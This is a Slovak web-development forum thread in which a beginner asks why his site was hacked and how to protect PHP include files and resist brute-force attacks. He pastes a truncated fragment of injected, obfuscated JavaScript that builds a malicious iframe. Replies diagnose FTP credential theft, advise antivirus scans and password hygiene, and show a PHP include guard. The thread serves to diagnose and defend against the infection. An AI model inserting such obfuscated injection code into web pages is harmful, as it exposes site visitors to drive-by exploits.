Hack stranky

zaciatocnik · Napísal **zaciatocnik**: 06.02.2009 11:19

Nazdarek. Chcem sa opytat na par veci.

1. Mam spravenu indexovu stranku, na ktorej nie je vôbec nic, iba nazov stranky..cize ziadny odkaz, ziadny formular..nic. V jednoduchost asi toto:

Kód:

<html>
<body color: black>
<span style=' font-size: 24px; font-weight: bold; font-family: Tahoma, Verdana, Arial; color: green '>www.nazov stranky.sk</span>
</body>
</html>

Nic viac.. Ako je mozne ze mi to hackli...Teda, pri nacitavani mi vypise, ze taha data z nejakej stranky tusim imprerator.ru. A po nacitani sa mi zapne nacitavanie Acrobat Readeru, no skor ako ukonci nacitanie Acrobatu,tak mi vyhodi nejake varovne okienko. Ked som si pozrel zdrojovy kod tej stranky, tak som tam na moje prekvapenie nasiel nieco take:

Kód:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>www.nazovstranky.sk</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1250" >
<meta http-equiv="content-language" content="en" >
<meta name="description" content="Only4Web.com" >
<meta name="robots" content="all,follow" >
</head>
<body bottomMargin="0" bgcolor="black" leftMargin="0" topMargin="220" marginheight="0"
marginwidth="0" text-align="center"><!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+String.fromCharCode(60)+String.fromCharCode(105)+''+'fr'+unescape('%61%6D')+'e'+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+''+unescape('%3D%22%62')+String.fromCharCode(53)+String.fromCharCode(51)+String.fromCharCode(55)+''+unescape('%65%38%37%66')+unescape('%31%64%62')+'fafe'+unescape('%66%62')+unescape('%38%62%62%37')+...pokracuje to dalej.. 

Ako to mam osetrit, aby mi to nehackli???

2. Ako mam osetrit subor, ktory je includovany v index.php?? Mam teraz na mysli subor v ktorom mam ulozene len funkcie s nazvom napr. funkcie.php . V subore index.php ho mam zapisany takto:

Kód:

require "./funkcie.php";

Je nutne takyto subor vobec nejako este osetrovat proti nejakemu "vniknutiu", alebo je to zbytocne?? Ako to mate osetrene vy??

3. Par krat som sa uz na tomto fore stretol s vyrazom "brute force". S prispevkov som pochopil ze sa jedna o utok na DB, ale zaujimalo by ma to trocha viac. Cize o co presne go a ako sa predtym chranit?? Nevysvetlili by ste mi to niekto alebo hodili by ste mi nejaky link??

Viem ze je tu uz na nieco podobne tema .. myslim to bola : Ochrana PHP skriptov a vy , ale nejako som v tom nenasiel konkretne odpovede na moje otazky.. Mozno tam aj su, len som to asi nepochopil. :loony:

rooobertek · Napísal **rooobertek**: 06.02.2009 22:00

načo máš funkcie.php keď php ani nevyužívaš? Či to niekde inde?
Čo heslo? Nemáš náhodou na ftp napríklad meno "user" a heslo "user"?

Inak, odporúčal by som ti zbehnúť aspoň troma antivirákmi comp. Stavím sa, že ti to chcelo naservírovať nejaký exploit pomocou diery v adobe acrobat readeri.
Ten škaredý skript ti vytvorí iframe. Inak divím sa, že to ešte niekto používa takto, toto je trošku zastaralý spôsob by som povedal :-)

// tá tvoja stránka je už nahlásená ako škodlivá

Teda ak máš onlyforweb.com.
Okrem toho čo som napísal, snaží sa ešte zmenšiť okno prehliadača na čo najmenšiu veľkosť a robí to každé tri sekundy (300000 v setInterval)

emer · Napísal **emer**: 06.02.2009 22:20

toto som mal aj ja... vkladalo mi skodlivy kod do suborov s nazvom index.php, index.html na vsetkych FTP co som mal v totalcommanderi... prebehni pocitac nodom, zmen hesla na ftp a bude to ok

zaciatocnik · Napísal autor témy **zaciatocnik**: 07.02.2009 9:43

Dik za odpovede..
rooobertek .. Dik za odpoved, vazim si to, ale fakt si myslis, ze by som pouzival niekde prihlas. meno a heslo rovnake??? :shock:

Ten subor funkcie.php pouzivam inde

emer ...Presne toto mi to robi..Vklada mi to skodlivy kod do vsetkych index-ovych suborov..
Takze ak som to spravne pochopil, tak nejde o hack, ale skor o virus v mojom PC??
A co dalsie moje otazocky?? Odpoviete mi na nich?? Ako chranit take subory a co je to ta metoda Brute Force??

rooobertek · Napísal **rooobertek**: 07.02.2009 10:20

No podľa emerovej skúsenosti to vyzerá na to, že by si nemal ukladať heslá. Nikdy heslá neukladaj, to sa nevypláca.
Brute force je o tom, že robot skúša rozlúsknuť tvoje heslo. Najjednoduchšie je rozlúsknuť heslá, ktoré sa nachádzajú v slovníku - anglickom, slovenskom alebo inom. Potom sú ľahko rozlúštiteľné krátke heslá. Čím nezmyselnejšie a dlhšie heslo, tým ťažšie sa brute-forcuje

Môj rekord bol 34 znakov dlhé heslo skladajúce sa z malých a veľkým písmen, čísel a znakov. Ale to sa tiež ťažko pamätá....
No ale aj tak ti to nepomôže, ak máš v compe nejaký keylogger. To má potom útočník k dispozícii všetko, čo píšeš.

zaciatocnik · Napísal autor témy **zaciatocnik**: 07.02.2009 11:51

OK. THX..K tomu keyloggeru..Najde ho aj klasicky antivirak napr. NOD32, alebo na to treba nejaky iny program??
A este k tym samotnym suborom resp. funkcie.php . Treba to nejak zvlast osetrovat a ak ano, tak aka je najlepsia metoda?? :loony:

rooobertek · Napísal **rooobertek**: 07.02.2009 15:00

Ošetrovať treba, najlepšia metóda je naučiť sa všetko o bezpečnosti a podľa toho robiť kód

je toho naozaj veľa, načo treba myslieť

neopagan · Napísal **neopagan**: 08.02.2009 18:58

prva zasada, na ktoru som aj ja raz doplatil je - nikdy si nenechavaj zapisane heslo v Total Commanderi.... meno si nechaj a heslo si pis pri kazdom spojeni ftp - ak teda pouzivas TC...

ostatne veci - suhlasim s predchodzimi prispevkami.

A pri inkludovani suborov ja pouzivam toto: v subore definujes hned na zaciatku taketo nieco

Kód:

define('subor', true);

a v tom subore, ktory budes includovat das kontrolu na zaciatok

Kód:

if (!defined('subor')) {die("Nemáte povolený prístup na túto stránku !");}?>

to ti vsak len zaisti, ze includovana stranka bude funkcna jedine v tom subore, kam ho chces inkludovat..

Ostatne sposoby ochrany skus vygooglit....

Hack stranky

Podobné témy